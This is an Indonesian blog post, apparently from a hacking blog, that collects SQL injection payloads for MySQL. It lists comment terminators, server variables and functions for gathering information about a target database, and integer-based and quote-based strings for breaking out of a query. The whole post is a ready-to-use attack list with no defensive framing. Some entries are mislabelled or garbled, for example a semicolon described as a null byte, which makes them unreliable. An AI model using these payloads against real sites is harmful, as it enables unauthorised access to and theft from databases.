Lompat ke konten Lompat ke sidebar Lompat ke footer

Fix Sql Injection Query (Collection)

Kali ini gw mau sharing artikel perihal Fix SQL Injection Query.

Berikut collection querynya sebagai berikut ini,

Comment Name
-- : MySQL Linux Style
--+ : MySQL Windows Style
# : Hash (URL encode while use)
--+- : SQL Comment
; : Null Byte
` : Backtick

Variable/Function Output
@@hostname : Current Hostname
@@tmpdir : Tept Directory
@@datadir : Data Directory
@@version : Version of DB
@@basedir : Base Directory
user() : Current User
database() : Current Database
version() : Version
schema() : current Database
UUID() : System UUID key
current_user() : Current User
current_user : Current User
system_user() : Current Sustem user
session_user() : Session user
@@GLOBAL.have_symlink : Check if Symlink Enabled or Disabled
@@GLOBAL.have_ssl : Check if it have ssl or n

integer based
--
-- -
--+-
)--
)-- -
)--+-
))--
))-- -
))--+-
;
) ;
));
%23
%60
%90
and 1=1
and '1'='1
and (1)=(1
php?id=(1) -- -

string based
'--+-
')-- -
')--+-
'))-- -
'))--+-
';
');
'));
'%23
'%60
'%90
' and 1=1
' and '1'='1
' and (1)=(1
php?id=(1') -- -

string based double quotes
"-- -
"--+-
"%23
")-- -
")--+-
"))--+-
";
") ;
"));
"%60
"%90
" and 1=1
" and '1'='1
" and (1)=(1
php?id=(1") -- -

Sekian dari gw, agar bermanfaat.

Sumber http://maqlo-heker.blogspot.com/